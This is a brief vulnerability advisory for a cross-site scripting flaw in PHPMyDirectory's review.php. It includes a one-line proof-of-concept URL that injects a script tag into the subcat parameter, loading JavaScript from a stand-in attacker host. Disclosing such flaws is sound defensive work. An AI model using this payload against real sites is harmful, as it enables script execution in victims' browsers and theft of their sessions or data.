PHPMyDirectory Review.PHP Multiple Parameter Cross-Site Scripting Vulnerability

PHPMyDirectory Review.PHP Multiple Parameter Cross-Site Scripting Vulnerability

An exploit is not required.

The following proof of concept example is available:
http://www.example.com/review.php?id=1&cat=&subcat="><script src=http://evil/foo.js></script>